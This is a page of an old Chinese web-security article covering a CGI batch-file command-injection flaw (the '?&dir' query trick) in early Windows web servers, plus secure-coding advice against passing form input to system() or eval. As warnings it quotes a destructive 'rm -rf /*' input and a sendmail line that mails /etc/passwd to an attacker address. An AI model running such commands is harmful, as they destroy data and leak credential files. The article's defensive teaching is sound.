WEB开发网
开发学院网络安全防火墙 Web 安全技术与防火墙 阅读

Web 安全技术与防火墙

 2007-06-22 12:45:36 来源:WEB开发网   
核心提示: 〖2〗CGI执行批处理文件的漏洞文件名:test.bat: @echo off echo Content-type: text/plain echo echo Hello World!如果客户浏览器的URL为:/cgi-bin/test.bat?&dir则执行调用命令解释器完成dir列表

〖2〗CGI执行批处理文件的漏洞

文件名:test.bat:

    @echo off
    echo Content-type: text/plain
    echo
    echo Hello World!

如果客户浏览器的URL为:/cgi-bin/test.bat?&dir则执行调用命令解释器完成dir列表。这给访问者有执行其他命令可能性。

2)O'Reilly WebSite server for Windows NT/95

在WebSite1.1B以前的版本中使用配处理文件存在着Netscape同样的漏洞,但是,新版关闭.bat在cgi中的作用。支持perl,VB和C作为CGI开发工具。至于他的安全问题参看:http://website.ora.com/devcomer/secalert1。

3)Microsoft's IIS Web Server

在96年3月5日前的IIS在NT下的.bat CGI的 bug甚至比其他更严重,可以任意使用command命令。但之后修补该漏洞。你可检查你的可执行文件的建立日期。IIS3.0还存在一些安全bug,主要是cgi-bin下的覆给权利。

另外,许多 WEB服务器本身都存在一些安全上的漏洞,都是在版本升级过程不断更新。在这就不一一列举。    从CGI编程角度考虑安全:

〔1〕采用编译语言比解释语言会更安全些,并且 CGI程序应放在独立于HTML 存放目录之外的CGI-BIN下,是为了防止一些非法访问者从浏览器端取得解释性语言的原代码后从中寻找漏洞。

〔2〕在用C来编写CGI程序时尽量少用popen(), system()和所有涉及/bin/sh 的shell命令。在Perl中system(), exec(), open(),eval()等exec或eval之类命令。在由用户填写的form还回cgi时,不要直接调用system()之类函数。这是为避免当填写内容为"rm -rf /*"或"/usr/lib/sendmail nobody@nowhere.com; mail badguys@hell.org< /etc/passwd"之类内容。

上一页  1 2 3 4 5 6  下一页

Tags:Web 安全 技术

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接